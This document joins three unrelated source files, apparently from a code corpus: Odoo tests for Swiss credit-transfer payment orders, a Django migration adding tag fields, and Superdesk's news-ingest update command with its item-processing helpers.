# © 2016 Akretion (Alexis de Lattre <alexis.delattre@akretion.com>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo.addons.account.tests.account_test_classes\
import AccountingTestCase
from odoo.tools import float_compare
import time
from lxml import etree
ch_iban = 'CH15 3881 5158 3845 3843 7'
class TestSCT_CH(AccountingTestCase):
    """Integration tests for Swiss credit transfers (pain.001.001.03.ch.02).

    Covers payment type 1 (BVR reference, CH01 local instrument) and
    payment type 3 (plain IBAN transfer, no local instrument).
    """
    def setUp(self):
        """Create Swiss banks, company bank account, journal and payment mode."""
        super(TestSCT_CH, self).setUp()
        Account = self.env['account.account']
        Journal = self.env['account.journal']
        PaymentMode = self.env['account.payment.mode']
        self.payment_order_model = self.env['account.payment.order']
        self.payment_line_model = self.env['account.payment.line']
        self.bank_line_model = self.env['bank.payment.line']
        self.partner_bank_model = self.env['res.partner.bank']
        self.attachment_model = self.env['ir.attachment']
        self.invoice_model = self.env['account.invoice']
        self.invoice_line_model = self.env['account.invoice.line']
        self.main_company = self.env.ref('base.main_company')
        self.partner_agrolait = self.env.ref('base.res_partner_2')
        self.account_expense = Account.search([(
            'user_type_id',
            '=',
            self.env.ref('account.data_account_type_expenses').id)], limit=1)
        self.account_payable = Account.search([(
            'user_type_id',
            '=',
            self.env.ref('account.data_account_type_payable').id)], limit=1)
        # Create a swiss bank
        ch_bank1 = self.env['res.bank'].create({
            'name': 'Alternative Bank Schweiz AG',
            'bic': 'ALSWCH21XXX',
            'clearing': '38815',
            'ccp': '46-110-7',
        })
        # create a ch bank account for my company
        self.cp_partner_bank = self.partner_bank_model.create({
            'acc_number': ch_iban,
            'partner_id': self.env.ref('base.main_partner').id,
        })
        self.cp_partner_bank.onchange_acc_number_set_swiss_bank()
        # create journal
        self.bank_journal = Journal.create({
            'name': 'Company Bank journal',
            'type': 'bank',
            'code': 'BNKFB',
            'bank_account_id': self.cp_partner_bank.id,
            'bank_id': ch_bank1.id,
        })
        # create a payment mode
        pay_method_id = self.env.ref(
            'account_banking_sepa_credit_transfer.sepa_credit_transfer').id
        self.payment_mode = PaymentMode.create({
            'name': 'CH credit transfer',
            'bank_account_link': 'fixed',
            'fixed_journal_id': self.bank_journal.id,
            'payment_method_id': pay_method_id,
        })
        # Force the Swiss flavour of the pain.001 schema.
        self.payment_mode.payment_method_id.pain_version =\
            'pain.001.001.03.ch.02'
        self.chf_currency = self.env.ref('base.CHF')
        self.eur_currency = self.env.ref('base.EUR')
        self.main_company.currency_id = self.chf_currency.id
        ch_bank2 = self.env['res.bank'].create({
            'name': 'Banque Cantonale Vaudoise',
            'bic': 'BCVLCH2LXXX',
            'clearing': '767',
            'ccp': '01-1234-1',
        })
        # Create a bank account with clearing 767
        self.agrolait_partner_bank = self.partner_bank_model.create({
            'acc_number': 'CH9100767000S00023455',
            'partner_id': self.partner_agrolait.id,
            'bank_id': ch_bank2.id,
            'ccp': '01-1234-1',
        })
    def test_sct_ch_payment_type1(self):
        """Two BVR invoices: expect 2 bank lines and CH01 local instrument."""
        invoice1 = self.create_invoice(
            self.partner_agrolait.id,
            self.agrolait_partner_bank.id, self.chf_currency, 42.0,
            'bvr', '132000000000000000000000014')
        invoice2 = self.create_invoice(
            self.partner_agrolait.id,
            self.agrolait_partner_bank.id, self.chf_currency, 12.0,
            'bvr', '132000000000004')
        for inv in [invoice1, invoice2]:
            action = inv.create_account_payment_line()
        self.assertEquals(action['res_model'], 'account.payment.order')
        self.payment_order = self.payment_order_model.browse(action['res_id'])
        self.assertEquals(
            self.payment_order.payment_type, 'outbound')
        self.assertEquals(
            self.payment_order.payment_mode_id, self.payment_mode)
        self.assertEquals(
            self.payment_order.journal_id, self.bank_journal)
        pay_lines = self.payment_line_model.search([
            ('partner_id', '=', self.partner_agrolait.id),
            ('order_id', '=', self.payment_order.id)])
        self.assertEquals(len(pay_lines), 2)
        agrolait_pay_line1 = pay_lines[0]
        accpre = self.env['decimal.precision'].precision_get('Account')
        self.assertEquals(agrolait_pay_line1.currency_id, self.chf_currency)
        self.assertEquals(
            agrolait_pay_line1.partner_bank_id, invoice1.partner_bank_id)
        self.assertEquals(float_compare(
            agrolait_pay_line1.amount_currency, 42, precision_digits=accpre),
            0)
        self.assertEquals(agrolait_pay_line1.communication_type, 'bvr')
        self.assertEquals(
            agrolait_pay_line1.communication,
            '132000000000000000000000014')
        self.payment_order.draft2open()
        self.assertEquals(self.payment_order.state, 'open')
        self.assertEquals(self.payment_order.sepa, False)
        # BVR references may not be merged: one bank line per invoice.
        bank_lines = self.bank_line_model.search([
            ('partner_id', '=', self.partner_agrolait.id)])
        self.assertEquals(len(bank_lines), 2)
        for bank_line in bank_lines:
            self.assertEquals(bank_line.currency_id, self.chf_currency)
            self.assertEquals(bank_line.communication_type, 'bvr')
            self.assertEquals(
                bank_line.communication in [
                    '132000000000000000000000014',
                    '132000000000004'], True)
            self.assertEquals(
                bank_line.partner_bank_id, invoice1.partner_bank_id)
        action = self.payment_order.open2generated()
        self.assertEquals(self.payment_order.state, 'generated')
        attachment = self.attachment_model.browse(action.get('attachment_id',
                                                             action['res_id']))
        self.assertEquals(attachment.datas_fname[-4:], '.xml')
        xml_file = attachment.datas.decode('base64')
        xml_root = etree.fromstring(xml_file)
        # print "xml_file=", etree.tostring(xml_root, pretty_print=True)
        namespaces = xml_root.nsmap
        namespaces['p'] = xml_root.nsmap[None]
        namespaces.pop(None)
        pay_method_xpath = xml_root.xpath(
            '//p:PmtInf/p:PmtMtd', namespaces=namespaces)
        self.assertEquals(
            namespaces['p'],
            'http://www.six-interbank-clearing.com/de/'
            'pain.001.001.03.ch.02.xsd')
        self.assertEquals(pay_method_xpath[0].text, 'TRF')
        # Type 1 payments carry no SEPA service level but a CH01 instrument.
        sepa_xpath = xml_root.xpath(
            '//p:PmtInf/p:PmtTpInf/p:SvcLvl/p:Cd', namespaces=namespaces)
        self.assertEquals(len(sepa_xpath), 0)
        local_instrument_xpath = xml_root.xpath(
            '//p:PmtInf/p:PmtTpInf/p:LclInstrm/p:Prtry', namespaces=namespaces)
        self.assertEquals(local_instrument_xpath[0].text, 'CH01')
        debtor_acc_xpath = xml_root.xpath(
            '//p:PmtInf/p:DbtrAcct/p:Id/p:IBAN', namespaces=namespaces)
        self.assertEquals(
            debtor_acc_xpath[0].text,
            self.payment_order.company_partner_bank_id.sanitized_acc_number)
        self.payment_order.generated2uploaded()
        self.assertEquals(self.payment_order.state, 'uploaded')
        for inv in [invoice1, invoice2]:
            self.assertEquals(inv.state, 'paid')
        return
    def test_sct_ch_payment_type3(self):
        """Two plain EUR invoices: lines merge into one and no local instrument."""
        invoice1 = self.create_invoice(
            self.partner_agrolait.id,
            self.agrolait_partner_bank.id, self.eur_currency, 4042.0,
            'none', 'Inv1242')
        invoice2 = self.create_invoice(
            self.partner_agrolait.id,
            self.agrolait_partner_bank.id, self.eur_currency, 1012.55,
            'none', 'Inv1248')
        for inv in [invoice1, invoice2]:
            action = inv.create_account_payment_line()
        self.assertEquals(action['res_model'], 'account.payment.order')
        self.payment_order = self.payment_order_model.browse(action['res_id'])
        self.assertEquals(
            self.payment_order.payment_type, 'outbound')
        self.assertEquals(
            self.payment_order.payment_mode_id, self.payment_mode)
        self.assertEquals(
            self.payment_order.journal_id, self.bank_journal)
        pay_lines = self.payment_line_model.search([
            ('partner_id', '=', self.partner_agrolait.id),
            ('order_id', '=', self.payment_order.id)])
        self.assertEquals(len(pay_lines), 2)
        agrolait_pay_line1 = pay_lines[0]
        accpre = self.env['decimal.precision'].precision_get('Account')
        self.assertEquals(agrolait_pay_line1.currency_id, self.eur_currency)
        self.assertEquals(
            agrolait_pay_line1.partner_bank_id, invoice1.partner_bank_id)
        self.assertEquals(float_compare(
            agrolait_pay_line1.amount_currency, 4042.0,
            precision_digits=accpre), 0)
        self.assertEquals(agrolait_pay_line1.communication_type, 'normal')
        self.assertEquals(
            agrolait_pay_line1.communication, 'Inv1242')
        self.payment_order.draft2open()
        self.assertEquals(self.payment_order.state, 'open')
        self.assertEquals(self.payment_order.sepa, False)
        # 'normal' communications are merged into a single bank line.
        bank_lines = self.bank_line_model.search([
            ('partner_id', '=', self.partner_agrolait.id)])
        self.assertEquals(len(bank_lines), 1)
        bank_line = bank_lines[0]
        self.assertEquals(bank_line.currency_id, self.eur_currency)
        self.assertEquals(bank_line.communication_type, 'normal')
        self.assertEquals(bank_line.communication, 'Inv1242-Inv1248')
        self.assertEquals(
            bank_line.partner_bank_id, invoice1.partner_bank_id)
        action = self.payment_order.open2generated()
        self.assertEquals(self.payment_order.state, 'generated')
        attachment = self.attachment_model.browse(action.get('attachment_id',
                                                             action['res_id']))
        self.assertEquals(attachment.datas_fname[-4:], '.xml')
        xml_file = attachment.datas.decode('base64')
        xml_root = etree.fromstring(xml_file)
        # print "xml_file=", etree.tostring(xml_root, pretty_print=True)
        namespaces = xml_root.nsmap
        namespaces['p'] = xml_root.nsmap[None]
        namespaces.pop(None)
        pay_method_xpath = xml_root.xpath(
            '//p:PmtInf/p:PmtMtd', namespaces=namespaces)
        self.assertEquals(
            namespaces['p'],
            'http://www.six-interbank-clearing.com/de/'
            'pain.001.001.03.ch.02.xsd')
        self.assertEquals(pay_method_xpath[0].text, 'TRF')
        # Type 3 payments have neither SEPA service level nor local instrument.
        sepa_xpath = xml_root.xpath(
            '//p:PmtInf/p:PmtTpInf/p:SvcLvl/p:Cd', namespaces=namespaces)
        self.assertEquals(len(sepa_xpath), 0)
        local_instrument_xpath = xml_root.xpath(
            '//p:PmtInf/p:PmtTpInf/p:LclInstrm/p:Prtry', namespaces=namespaces)
        self.assertEquals(len(local_instrument_xpath), 0)
        debtor_acc_xpath = xml_root.xpath(
            '//p:PmtInf/p:DbtrAcct/p:Id/p:IBAN', namespaces=namespaces)
        self.assertEquals(
            debtor_acc_xpath[0].text,
            self.payment_order.company_partner_bank_id.sanitized_acc_number)
        self.payment_order.generated2uploaded()
        self.assertEquals(self.payment_order.state, 'uploaded')
        for inv in [invoice1, invoice2]:
            self.assertEquals(inv.state, 'paid')
        return
    def create_invoice(
            self, partner_id, partner_bank_id, currency, price_unit,
            ref_type, ref, type='in_invoice'):
        """Create and validate a one-line supplier invoice for the tests."""
        invoice = self.invoice_model.create({
            'partner_id': partner_id,
            'reference_type': ref_type,
            'reference': ref,
            'currency_id': currency.id,
            'name': 'test',
            'account_id': self.account_payable.id,
            'type': type,
            'date_invoice': time.strftime('%Y-%m-%d'),
            'payment_mode_id': self.payment_mode.id,
            'partner_bank_id': partner_bank_id,
        })
        self.invoice_line_model.create({
            'invoice_id': invoice.id,
            'price_unit': price_unit,
            'quantity': 1,
            'name': 'Great service',
            'account_id': self.account_expense.id,
        })
        invoice.invoice_validate()
        invoice.action_move_create()
        return invoice
|
better-dem/portal
|
core/migrations/0011_auto_20161028_2250.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-10-28 22:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a `tags` many-to-many field to ParticipationItem and UserProfile."""
    dependencies = [
        ('core', '0010_auto_20161026_2148'),
    ]
    operations = [
        migrations.AddField(
            model_name='participationitem',
            name='tags',
            field=models.ManyToManyField(to='core.Tag'),
        ),
        migrations.AddField(
            model_name='userprofile',
            name='tags',
            field=models.ManyToManyField(to='core.Tag'),
        ),
    ]
|
plamut/superdesk-core
|
superdesk/io/commands/update_ingest.py
|
# -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
import logging
import superdesk
from flask import current_app as app
from datetime import timedelta, timezone, datetime
from werkzeug.exceptions import HTTPException
from superdesk.notification import push_notification
from superdesk.activity import ACTIVITY_EVENT, notify_and_add_activity
from superdesk.io import providers
from superdesk.celery_app import celery
from superdesk.celery_task_utils import get_lock_id, get_host_id
from superdesk.utc import utcnow, get_expiry_date
from superdesk.workflow import set_default_state
from superdesk.errors import ProviderError
from superdesk.stats import stats
from superdesk.upload import url_for_media
from superdesk.media.media_operations import download_file_from_url, process_file
from superdesk.media.renditions import generate_renditions
from superdesk.io.iptc import subject_codes
from superdesk.metadata.item import GUID_NEWSML, GUID_FIELD, FAMILY_ID, ITEM_TYPE, CONTENT_TYPE
from superdesk.metadata.utils import generate_guid
from superdesk.lock import lock, unlock
# Fallback polling interval when a provider defines no update_schedule.
UPDATE_SCHEDULE_DEFAULT = {'minutes': 5}
LAST_UPDATED = 'last_updated'  # provider field: last time an update ran
LAST_ITEM_UPDATE = 'last_item_update'  # provider field: last time items arrived
STATE_INGESTED = 'ingested'
IDLE_TIME_DEFAULT = {'hours': 0, 'minutes': 0}  # 0/0 disables idle alerts
logger = logging.getLogger(__name__)
# Register the ingest workflow state and action with superdesk at import time.
superdesk.workflow_state(STATE_INGESTED)
superdesk.workflow_action(
    name='ingest'
)
def is_valid_type(provider, provider_type_filter=None):
    """Test if given provider has valid type and should be updated.
    :param provider: provider to be updated
    :param provider_type_filter: active provider type filter
    """
    ptype = provider.get('type')
    if ptype not in providers:
        # Unknown type: no registered ingest service can handle it.
        return False
    return not (provider_type_filter and ptype != provider_type_filter)
def is_scheduled(provider):
    """Test if given provider should be scheduled for update.
    :param provider: ingest provider
    """
    now = utcnow()
    # Providers that never ran get a timestamp far in the past => run now.
    last_run = provider.get(LAST_UPDATED, now - timedelta(days=100))
    interval = timedelta(**provider.get('update_schedule', UPDATE_SCHEDULE_DEFAULT))
    return now > last_run + interval
def is_closed(provider):
    """Test if provider is closed.
    :param provider: ingest provider
    """
    try:
        return provider['is_closed']
    except KeyError:
        return False
def filter_expired_items(provider, items):
    """Return only the items whose expiry lies in the future.

    Items without an expiry/versioncreated, or with a naive (tz-less)
    expiry datetime, are dropped. Errors are wrapped in a ProviderError.
    """
    def is_not_expired(item):
        if item.get('expiry') or item.get('versioncreated'):
            # Default expiry = versioncreated + provider's content_expiry delta.
            expiry = item.get('expiry', item['versioncreated'] + delta)
            if expiry.tzinfo:
                return expiry > utcnow()
        return False
    try:
        # NOTE: `delta` is a closure variable for is_not_expired, bound here
        # before the list comprehension runs the filter.
        delta = timedelta(minutes=provider.get('content_expiry', app.config['INGEST_EXPIRY_MINUTES']))
        return [item for item in items if is_not_expired(item)]
    except Exception as ex:
        raise ProviderError.providerFilterExpiredContentError(ex, provider)
def get_provider_rule_set(provider):
    """Fetch the provider's rule set from the DB, or None when not configured."""
    rule_set_id = provider.get('rule_set')
    if not rule_set_id:
        return None
    return superdesk.get_resource_service('rule_sets').find_one(_id=rule_set_id, req=None)
def get_provider_routing_scheme(provider):
    """Returns the ingests provider's routing scheme configuration.
    If provider has a routing scheme defined (i.e. scheme ID is not None), the
    scheme is fetched from the database. If not, nothing is returned.
    For all scheme rules that have a reference to a content filter defined,
    that filter's configuration is fetched from the database as well and
    embedded into the corresponding scheme rule.
    :param dict provider: ingest provider configuration
    :return: fetched provider's routing scheme configuration (if any)
    :rtype: dict or None
    """
    if not provider.get('routing_scheme'):
        return None
    schemes_service = superdesk.get_resource_service('routing_schemes')
    filters_service = superdesk.get_resource_service('content_filters')
    scheme = schemes_service.find_one(_id=provider['routing_scheme'], req=None)
    # for those routing rules that have a content filter defined,
    # get that filter from DB and embed it into the rule...
    rules_filters = (
        (rule, str(rule['filter']))
        for rule in scheme['rules'] if rule.get('filter'))
    for rule, filter_id in rules_filters:
        content_filter = filters_service.find_one(_id=filter_id, req=None)
        # Replace the filter id with the full filter configuration in place.
        rule['filter'] = content_filter
    return scheme
def get_task_ttl(provider):
    """Compute the celery task expiry (seconds) from the provider's schedule."""
    schedule = provider.get('update_schedule', UPDATE_SCHEDULE_DEFAULT)
    seconds = schedule.get('minutes', 0) * 60
    seconds += schedule.get('hours', 0) * 3600
    return seconds
def get_is_idle(providor):
    """Return True when the provider has been quiet longer than its idle window.

    :param providor: ingest provider dict; reads ``last_item_update`` and an
        optional ``idle_time`` config of the form {'hours': h, 'minutes': m}
    """
    last_item = providor.get(LAST_ITEM_UPDATE)
    idle_time = providor.get('idle_time', IDLE_TIME_DEFAULT)
    # Fix: use .get() with defaults so a partial idle_time config (missing
    # 'hours' or 'minutes') no longer raises KeyError. Some stored configs
    # contain datetimes instead of ints; treat those as 0 (check disabled),
    # matching the original isinstance guards.
    idle_hours = idle_time.get('hours', 0)
    if isinstance(idle_hours, datetime):
        idle_hours = 0
    idle_minutes = idle_time.get('minutes', 0)
    if isinstance(idle_minutes, datetime):
        idle_minutes = 0
    # Idle only when there was prior activity and a non-zero window is set.
    if last_item and (idle_hours != 0 or idle_minutes != 0):
        if utcnow() > last_item + timedelta(hours=idle_hours, minutes=idle_minutes):
            return True
    return False
def get_task_id(provider):
    """Build the unique update task id from the provider's name and _id."""
    name = provider.get('name')
    provider_id = provider.get(superdesk.config.ID_FIELD)
    return 'update-ingest-{0}-{1}'.format(name, provider_id)
def is_updatable(provider):
    """Test if given provider has service that can update it.
    :param provider
    """
    return hasattr(providers.get(provider.get('type')), 'update')
class UpdateIngest(superdesk.Command):
    """Update ingest providers."""
    option_list = (
        superdesk.Option('--provider', '-p', dest='provider_type'),
    )
    def run(self, provider_type=None):
        # For every provider that matches the optional type filter, has an
        # update-capable service, is due per its schedule and is not closed,
        # queue an async update task that expires after one schedule interval.
        for provider in superdesk.get_resource_service('ingest_providers').get(req=None, lookup={}):
            if (is_valid_type(provider, provider_type) and is_updatable(provider)
                    and is_scheduled(provider) and not is_closed(provider)):
                kwargs = {
                    'provider': provider,
                    'rule_set': get_provider_rule_set(provider),
                    'routing_scheme': get_provider_routing_scheme(provider)
                }
                update_provider.apply_async(
                    expires=get_task_ttl(provider),
                    kwargs=kwargs)
@celery.task(soft_time_limit=1800, bind=True)
def update_provider(self, provider, rule_set=None, routing_scheme=None):
    """
    Fetches items from ingest provider as per the configuration, ingests them into Superdesk and
    updates the provider.
    """
    if provider.get('type') == 'search':
        # Search providers are queried on demand, never ingested.
        return
    if not is_updatable(provider):
        return
    # Distributed lock keyed on the provider; expiry matches the task's
    # soft_time_limit so a crashed worker cannot block updates forever.
    lock_name = get_lock_id('ingest', provider['name'], provider[superdesk.config.ID_FIELD])
    host_name = get_host_id(self)
    if not lock(lock_name, host_name, expire=1800):
        return
    try:
        update = {
            LAST_UPDATED: utcnow()
        }
        for items in providers[provider.get('type')].update(provider):
            ingest_items(items, provider, rule_set, routing_scheme)
            stats.incr('ingest.ingested_items', len(items))
            if items:
                # Only stamp LAST_ITEM_UPDATE when something actually arrived.
                update[LAST_ITEM_UPDATE] = utcnow()
        ingest_service = superdesk.get_resource_service('ingest_providers')
        ingest_service.system_update(provider[superdesk.config.ID_FIELD], update, provider)
        if LAST_ITEM_UPDATE not in update and get_is_idle(provider):
            # No new items and the provider exceeded its idle window: alert admins.
            notify_and_add_activity(
                ACTIVITY_EVENT,
                'Provider {{name}} has gone strangely quiet. Last activity was on {{last}}',
                resource='ingest_providers',
                user_list=ingest_service._get_administrators(),
                name=provider.get('name'),
                last=provider[LAST_ITEM_UPDATE].replace(tzinfo=timezone.utc).astimezone(tz=None).strftime("%c"))
        logger.info('Provider {0} updated'.format(provider[superdesk.config.ID_FIELD]))
        # Only push a notification if there has been an update
        if LAST_ITEM_UPDATE in update:
            push_notification('ingest:update', provider_id=str(provider[superdesk.config.ID_FIELD]))
    finally:
        unlock(lock_name, host_name)
def process_anpa_category(item, provider):
    """Normalize the item's anpa_category entries against the vocabulary.

    Fills in the display name and canonicalizes the qcode case for each
    category; wraps any failure in a ProviderError.
    """
    try:
        anpa_categories = superdesk.get_resource_service('vocabularies').find_one(req=None, _id='categories')
        if anpa_categories:
            for item_category in item['anpa_category']:
                for anpa_category in anpa_categories['items']:
                    if anpa_category['is_active'] is True \
                            and item_category['qcode'].lower() == anpa_category['qcode'].lower():
                        item_category['name'] = anpa_category['name']
                        # make the case of the qcode match what we hold in our dictionary
                        item_category['qcode'] = anpa_category['qcode']
                        break
    except Exception as ex:
        raise ProviderError.anpaError(ex, provider)
def derive_category(item, provider):
    """Derive anpa categories from the item's IPTC subjects.

    Uses the 'iptc_category_map' vocabulary to translate the item's subject
    codes into anpa categories, collapsing duplicates. When at least one
    category is derived it is set on the item and the category names are
    resolved via process_anpa_category.

    :param item: ingested item, possibly carrying a 'subject' list
    :param provider: ingest provider, forwarded for error reporting
    :return: None; failures are logged and swallowed
    """
    try:
        derived = []
        mapping = superdesk.get_resource_service('vocabularies').find_one(req=None, _id='iptc_category_map')
        if mapping:
            active_entries = (entry for entry in mapping['items'] if entry['is_active'])
            for entry in active_entries:
                subject_qcodes = [subj['qcode'] for subj in item.get('subject', [])]
                already_there = any(cat['qcode'] == entry['category'] for cat in derived)
                if entry['subject'] in subject_qcodes and not already_there:
                    derived.append({'qcode': entry['category']})
        if derived:
            item['anpa_category'] = derived
            process_anpa_category(item, provider)
    except Exception as ex:
        logger.exception(ex)
def process_iptc_codes(item, provider):
    """
    Ensures that the higher level IPTC codes are present by inserting them if missing, for example
    if given 15039001 (Formula One) make sure that 15039000 (motor racing) and 15000000 (sport) are there as well
    :param item: A story item
    :param provider: the ingest provider, used for error reporting
    :return: A story item with possible expanded subjects
    :raises ProviderError: wraps any failure (e.g. a qcode missing from subject_codes) as an iptcError
    """
    try:
        def iptc_already_exists(code):
            # True when the item already carries a subject with this qcode
            for entry in item['subject']:
                if 'qcode' in entry and code == entry['qcode']:
                    return True
            return False

        # Iterate over a snapshot: the loop body appends to item['subject'],
        # and mutating a list while iterating it also visits the new entries.
        for subject in list(item['subject']):
            if 'qcode' in subject and len(subject['qcode']) == 8:
                top_qcode = subject['qcode'][:2] + '000000'
                if not iptc_already_exists(top_qcode):
                    item['subject'].append({'qcode': top_qcode, 'name': subject_codes[top_qcode]})
                mid_qcode = subject['qcode'][:5] + '000'
                if not iptc_already_exists(mid_qcode):
                    item['subject'].append({'qcode': mid_qcode, 'name': subject_codes[mid_qcode]})
    except Exception as ex:
        raise ProviderError.iptcError(ex, provider)
def derive_subject(item):
    """Derive the item's subject from its anpa categories.

    Looks up each of the item's anpa categories in the 'categories'
    vocabulary; every active entry that defines a subject replaces the
    item's 'subject' field with that single subject (so when several
    categories map, the last one wins).

    :param item: ingested item carrying an 'anpa_category' list
    :return: None; failures are logged and swallowed
    """
    try:
        vocabulary = superdesk.get_resource_service('vocabularies').find_one(req=None, _id='categories')
        if not vocabulary:
            return
        for category in item['anpa_category']:
            matches = [entry for entry in vocabulary['items']
                       if entry['qcode'] == category['qcode'] and entry['is_active']]
            if matches and 'subject' in matches[0]:
                subject_qcode = matches[0].get('subject')
                item['subject'] = [{'qcode': subject_qcode, 'name': subject_codes[subject_qcode]}]
    except Exception as ex:
        logger.exception(ex)
def apply_rule_set(item, provider, rule_set=None):
    """
    Applies rules set on the item to be ingested into the system. If there's no rule set then the item will
    be returned without any change.
    :param item: Item to be ingested
    :param provider: provider object from whom the item was received
    :param rule_set: rule set to apply; when None the provider's configured rule set is looked up
    :return: the item, with every rule's old->new replacement applied to its body_html
    :raises ProviderError: wraps any failure as a ruleError
    """
    try:
        if rule_set is None and provider.get('rule_set') is not None:
            rule_set = superdesk.get_resource_service('rule_sets').find_one(_id=provider['rule_set'], req=None)
        if not rule_set or 'body_html' not in item:
            # nothing to apply: hand the item back untouched
            return item
        updated_body = item['body_html']
        for rule in rule_set['rules']:
            updated_body = updated_body.replace(rule['old'], rule['new'])
        item['body_html'] = updated_body
        return item
    except Exception as ex:
        raise ProviderError.ruleError(ex, provider)
def ingest_items(items, provider, rule_set=None, routing_scheme=None):
    """Ingest a batch of items fetched from a provider.

    Plain items are ingested first, then composite (package) items, so that
    package references can be resolved against already ingested content.
    Items referenced from a package are ingested without the routing scheme;
    routing is applied to the package itself instead.

    :param items: items fetched from the provider
    :param provider: ingest provider the items came from
    :param rule_set: optional rule set applied to each item
    :param routing_scheme: optional routing scheme applied after ingest
    :return: set of GUIDs of the items that failed to ingest
    """
    all_items = filter_expired_items(provider, items)
    items_dict = {doc[GUID_FIELD]: doc for doc in all_items}
    items_in_package = []
    failed_items = set()
    # Collect the residRefs of EVERY package in the batch. (This must
    # accumulate with extend(); assigning inside the loop would keep only
    # the refs of the last package.)
    for item in [doc for doc in all_items if doc.get(ITEM_TYPE) == CONTENT_TYPE.COMPOSITE]:
        items_in_package.extend(ref['residRef'] for group in item.get('groups', [])
                                for ref in group.get('refs', []) if 'residRef' in ref)
    for item in [doc for doc in all_items if doc.get(ITEM_TYPE) != CONTENT_TYPE.COMPOSITE]:
        # items that belong to a package are not routed individually
        ingested = ingest_item(item, provider, rule_set,
                               routing_scheme=routing_scheme if not item[GUID_FIELD] in items_in_package else None)
        if not ingested:
            failed_items.add(item[GUID_FIELD])
    for item in [doc for doc in all_items if doc.get(ITEM_TYPE) == CONTENT_TYPE.COMPOSITE]:
        for ref in [ref for group in item.get('groups', [])
                    for ref in group.get('refs', []) if 'residRef' in ref]:
            if ref['residRef'] in failed_items:
                # a package with a failed member fails as a whole
                failed_items.add(item[GUID_FIELD])
                continue
            ref.setdefault('location', 'ingest')
            itemRendition = items_dict.get(ref['residRef'], {}).get('renditions')
            if itemRendition:
                ref.setdefault('renditions', itemRendition)
            ref[GUID_FIELD] = ref['residRef']
            # point the reference at the stored item's database id
            if items_dict.get(ref['residRef']):
                ref['residRef'] = items_dict.get(ref['residRef'], {}).get(superdesk.config.ID_FIELD)
        if item[GUID_FIELD] in failed_items:
            continue
        ingested = ingest_item(item, provider, rule_set, routing_scheme)
        if not ingested:
            failed_items.add(item[GUID_FIELD])
    # index everything that succeeded in the search backend in one bulk call
    app.data._search_backend('ingest').bulk_insert('ingest', [item for item in all_items
                                                              if item[GUID_FIELD] not in failed_items])
    if failed_items:
        logger.error('Failed to ingest the following items: %s', failed_items)
    return failed_items
def ingest_item(item, provider, rule_set=None, routing_scheme=None):
    """Ingest a single item into the ingest collection.

    Enriches the item (categories, IPTC codes, rule set, renditions),
    persists it (insert, or update when the same guid was ingested before)
    and applies the routing scheme for new versions.

    :param item: the parsed item to ingest
    :param provider: ingest provider the item came from
    :param rule_set: optional rule set applied to the item body
    :param routing_scheme: optional routing scheme applied after persisting
    :return: True on success, False on any failure (which is logged)
    """
    try:
        item.setdefault(superdesk.config.ID_FIELD, generate_guid(type=GUID_NEWSML))
        item[FAMILY_ID] = item[superdesk.config.ID_FIELD]
        providers[provider.get('type')].provider = provider
        item['ingest_provider'] = str(provider[superdesk.config.ID_FIELD])
        item.setdefault('source', provider.get('source', ''))
        set_default_state(item, STATE_INGESTED)
        item['expiry'] = get_expiry_date(provider.get('content_expiry', app.config['INGEST_EXPIRY_MINUTES']),
                                         item.get('versioncreated'))
        if 'anpa_category' in item:
            process_anpa_category(item, provider)
        if 'subject' in item:
            # subjects present: expand IPTC codes and, if needed, derive the
            # category from the subjects
            process_iptc_codes(item, provider)
            if 'anpa_category' not in item:
                derive_category(item, provider)
        elif 'anpa_category' in item:
            # no subjects but a category: derive the subject from it
            derive_subject(item)
        apply_rule_set(item, provider, rule_set)
        ingest_service = superdesk.get_resource_service('ingest')
        if item.get('ingest_provider_sequence') is None:
            ingest_service.set_ingest_provider_sequence(item, provider)
        old_item = ingest_service.find_one(guid=item[GUID_FIELD], req=None)
        rend = item.get('renditions', {})
        if rend:
            # fetch the original image once and generate renditions from it
            baseImageRend = rend.get('baseImage') or next(iter(rend.values()))
            if baseImageRend:
                href = providers[provider.get('type')].prepare_href(baseImageRend['href'])
                update_renditions(item, href, old_item)
        new_version = True
        if old_item:
            # In case we already have the item, preserve the _id
            item[superdesk.config.ID_FIELD] = old_item[superdesk.config.ID_FIELD]
            ingest_service.put_in_mongo(item[superdesk.config.ID_FIELD], item)
            # if the feed is versioned and this is not a new version
            if 'version' in item and 'version' in old_item and item.get('version') == old_item.get('version'):
                new_version = False
        else:
            try:
                ingest_service.post_in_mongo([item])
            except HTTPException as e:
                # pass the exception as a lazy %-arg; the previous call passed
                # it as a stray positional which broke log record formatting
                logger.error('Exception while persisting item in ingest collection: %s', e)
        if routing_scheme and new_version:
            routed = ingest_service.find_one(_id=item[superdesk.config.ID_FIELD], req=None)
            superdesk.get_resource_service('routing_schemes').apply_routing_scheme(routed, provider, routing_scheme)
    except Exception as ex:
        logger.exception(ex)
        try:
            # best-effort error reporting; never let a sentry failure mask
            # the original error
            superdesk.app.sentry.captureException()
        except Exception:
            pass
        return False
    return True
def update_renditions(item, href, old_item):
    """
    If the old_item has renditions uploaded in to media then the old rendition details are
    assigned to the item, this avoids repeatedly downloading the same image and leaving the media entries orphaned.
    If there is no old_item the original is downloaded and renditions are
    generated.
    :param item: parsed item from source
    :param href: reference to original
    :param old_item: the item that we have already ingested, if it exists
    :return: item with renditions
    """
    stored_media = []
    try:
        # reuse the previously ingested renditions when they exist
        if old_item:
            previous_media = old_item.get('renditions', {}).get('original', {}).get('media', {})
            if previous_media:
                item['renditions'] = old_item['renditions']
                item['mimetype'] = old_item.get('mimetype')
                item['filemeta'] = old_item.get('filemeta')
                return
        content, filename, content_type = download_file_from_url(href)
        file_type, ext = content_type.split('/')
        metadata = process_file(content, file_type)
        file_guid = app.media.put(content, filename, content_type, metadata)
        stored_media.append(file_guid)
        rendition_spec = app.config.get('RENDITIONS', {}).get('picture', {})
        item['renditions'] = generate_renditions(content, file_guid, stored_media, file_type,
                                                 content_type, rendition_spec, url_for_media)
        item['mimetype'] = content_type
        item['filemeta'] = metadata
    except Exception:
        # roll back any media already stored so nothing is left orphaned
        for media_id in stored_media:
            app.media.delete(media_id)
        raise
superdesk.command('ingest:update', UpdateIngest())
|
